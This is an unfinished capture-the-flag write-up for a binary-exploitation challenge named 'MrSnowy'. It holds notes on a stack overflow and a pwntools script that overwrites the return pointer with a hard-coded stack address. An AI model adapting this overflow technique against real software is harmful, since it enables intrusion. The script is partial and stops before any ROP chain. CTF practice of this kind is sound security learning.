# MrSnowy

There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing.
But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house.
Something must be wrong with him.

## Flag

## Progress so far

- `read()` reads 0x108 bytes
- The Stackframe has a size of 0x40 bytes
- `checksec --file=mrsnowy` reports NX being enabled
  - So no shellcode will be placable unless there is executable space
  - This hints to ROP Chaining
- The binary should be patched to get rid of the timetaking animation
  - Just `nop` the banner() function call
- Overwriting the returnpointer of `investigate()`:

```python
context(arch='x86_64', os='linux')
context.terminal = ['/usr/bin/alacritty', '-e']
e = ELF("mr_snowy")
p = process(e.path)

def do_read():
  while True:
     ll = p.read()
     print(ll)
     if b'>' in ll:
       break

# if not patched wait for the animation and send 1
do_read()
p.sendline('1')
do_read()

# write 0x48 bytes and overwrite the return pointer to the top of the stackframe
p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))

# start the python debugger to get a coredump which is loadable by gdb
ipdb.set_trace()
```